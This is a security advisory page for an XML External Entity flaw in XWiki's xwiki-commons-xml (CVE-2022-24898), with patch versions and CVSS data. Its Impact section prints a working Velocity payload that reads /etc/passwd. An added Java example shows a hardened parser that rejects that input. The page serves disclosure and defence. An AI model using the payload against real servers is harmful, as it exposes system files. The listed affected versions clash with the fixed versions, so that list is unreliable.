Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1tMnI1LTR3OTYtcXhnNc1Biw
Arbitrary file access through XML parsing in org.xwiki.commons:xwiki-commons-xml
Impact
A script can read any file accessible to the user account running the XWiki application server, via XML External Entity (XXE) injection through the XML script service: the service parses attacker-supplied XML with a parser that resolves external entities declared in a DOCTYPE.
For example:
{{velocity}}
#set($xml=$services.get('xml'))
#set($xxe_payload = "<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root[<!ENTITY xxe SYSTEM 'file:///etc/passwd' >]><root><foo>&xxe;</foo></root>")
#set($doc=$xml.parse($xxe_payload))
$xml.serialize($doc)
{{/velocity}}
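As an added illustration (not XWiki's code and not the fix commit referenced below), this is the hardened JAXP parser configuration a defender would expect behind such a service: it refuses the DOCTYPE in the document above before any entity is resolved, so the referenced file is never opened. The class and method names are assumptions for the demo.

```java
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;
import java.io.StringReader;

public class HardenedXmlParse {

    // Constructed sample input: the same shape as the advisory's example, a DOCTYPE
    // declaring an external entity that points at a local file.
    static final String XXE_INPUT =
        "<?xml version='1.0' encoding='UTF-8'?>"
      + "<!DOCTYPE root[<!ENTITY xxe SYSTEM 'file:///etc/passwd' >]>"
      + "<root><foo>&xxe;</foo></root>";

    // Hardened factory: reject DOCTYPE declarations outright and, as defence in depth,
    // also turn off external entity resolution, external DTD loading and XInclude
    // in case a DOCTYPE is ever permitted again by a later configuration change.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    public static void main(String[] args) throws Exception {
        try {
            hardenedBuilder().parse(new InputSource(new StringReader(XXE_INPUT)));
            System.out.println("parsed (unexpected: the DOCTYPE should have been rejected)");
        } catch (SAXParseException e) {
            // With disallow-doctype-decl the parser aborts at the DOCTYPE, so no entity
            // is expanded and no file content can reach the serialized output.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Running it prints a "rejected:" line from the parser instead of a document containing the file contents; the same features apply to SAX and StAX factories created by the application.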
Patches
The problem has been patched on versions 12.10.10, 13.4.4 and 13.8RC1.
Workarounds
There's no easy workaround for fixing this vulnerability other than upgrading and being careful when giving Script rights.
References
https://jira.xwiki.org/browse/XWIKI-18946
For more information
If you have any questions or comments about this advisory:
- Open an issue in Jira XWiki
- Email us at XWiki Security mailing-list
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tMnI1LTR3OTYtcXhnNc1Biw
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: about 2 years ago
Updated: about 1 year ago
CVSS Score: 4.9
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Identifiers: GHSA-m2r5-4w96-qxg5, CVE-2022-24898
References:
- https://github.com/xwiki/xwiki-commons/security/advisories/GHSA-m2r5-4w96-qxg5
- https://github.com/xwiki/xwiki-commons/commit/947e8921ebd95462d5a7928f397dd1b64f77c7d5
- https://jira.xwiki.org/browse/XWIKI-18946
- https://nvd.nist.gov/vuln/detail/CVE-2022-24898
- https://github.com/advisories/GHSA-m2r5-4w96-qxg5
Blast Radius: 9.2
Affected Packages
maven:org.xwiki.commons:xwiki-commons-xml
Dependent packages: 10
Dependent repositories: 77
Downloads:
Affected Version Ranges: >= 13.5-rc-1, <= 13.7, >= 13.0.0, < 13.4.4, >= 2.7, < 12.10.10
Fixed in: 13.8-rc-1, 13.4.4, 12.10.10
All affected versions: 12.10.11, 13.4.6, 13.4.7
All unaffected versions: 13.10.2, 13.10.3, 13.10.4, 13.10.5, 13.10.6, 13.10.7, 13.10.8, 13.10.9, 13.10.10, 13.10.11, 14.2.1, 14.3.1, 14.4.1, 14.4.2, 14.4.3, 14.4.4, 14.4.5, 14.4.6, 14.4.7, 14.4.8, 14.10.1, 14.10.2, 14.10.3, 14.10.4, 14.10.5, 14.10.6, 14.10.7, 14.10.8, 14.10.9, 14.10.10, 14.10.11, 14.10.12, 14.10.13, 14.10.14, 14.10.15, 14.10.16, 14.10.17, 14.10.18, 14.10.19, 14.10.20, 14.10.21, 15.5.1, 15.5.2, 15.5.3, 15.5.4, 15.5.5, 15.10.1, 15.10.2, 15.10.3, 15.10.4, 15.10.5, 15.10.6, 15.10.7, 15.10.8, 16.0.0, 16.1.0, 16.2.0